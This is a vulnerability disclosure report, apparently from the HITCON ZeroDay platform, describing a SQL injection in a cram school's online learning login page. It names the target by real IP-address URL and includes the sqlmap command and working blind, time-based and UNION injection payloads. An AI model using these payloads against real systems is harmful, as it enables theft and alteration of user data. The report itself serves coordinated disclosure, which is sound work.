Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2023-00390
- Vendor: 北一補習班
- Title: 北一補習班雲端學習網SQL injection 漏洞
- Introduction: sql注入
處理狀態
目前狀態
公開
Last Update : 2023/09/26
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2023/07/27 22:23:37 : 新提交 (由 ddd 更新此狀態)
- 2023/07/28 17:24:33 : 新提交 (由 ddd 更新此狀態)
- 2023/07/28 17:28:07 : 新提交 (由 ddd 更新此狀態)
- 2023/07/28 17:28:17 : 新提交 (由 ddd 更新此狀態)
- 2023/07/29 11:55:31 : 新提交 (由 ddd 更新此狀態)
- 2023/07/29 11:56:04 : 新提交 (由 ddd 更新此狀態)
- 2023/07/29 11:56:43 : 新提交 (由 ddd 更新此狀態)
- 2023/07/29 11:56:58 : 新提交 (由 ddd 更新此狀態)
- 2023/07/29 12:34:45 : 新提交 (由 ddd 更新此狀態)
- 2023/07/29 12:35:39 : 新提交 (由 ddd 更新此狀態)
- 2023/07/29 12:41:57 : 新提交 (由 ddd 更新此狀態)
- 2023/07/29 12:42:42 : 新提交 (由 ddd 更新此狀態)
- 2023/07/31 14:27:14 : 新提交 (由 ddd 更新此狀態)
- 2023/07/31 15:17:00 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/08/08 18:57:04 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/08/08 18:57:04 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/09/26 03:00:07 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2023-00390
- 通報者:4t5g4tbg4h46h4 (ddd)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://139.162.97.208/peii/istudy/index_login.php
敘述
POST 參數 login 存在 SQL injection
步驟:使用工具burp suite進行抓包然後把抓到的包存到sqlmap工具的同目錄下
打開sqlmap: python sqlmap.py -l t -a (t為burp suite抓到包的命名可自訂)
SQLMap探測解果:
Parameter: login (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: isUpdating=false&login=-6929' OR 9564=9564-- JHdG&passwd=1&checkbox=on&status=login&dev=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: isUpdating=false&login=1' AND (SELECT 6099 FROM (SELECT(SLEEP(5)))Hotc)-- oWaY&passwd=1&checkbox=on&status=login&dev=
Type: UNION query
Title: Generic UNION query (NULL) - 36 columns
Payload: isUpdating=false&login=1' UNION ALL SELECT 95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,CONCAT(0x717a716271,0x52454f62526f4a6856464b7a6146686a79446d785a7a45466d55664d54596767666e6e4269755447,0x7171706a71),95,95,95,95,95,95-- -&passwd=1&checkbox=on&status=login&dev=
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。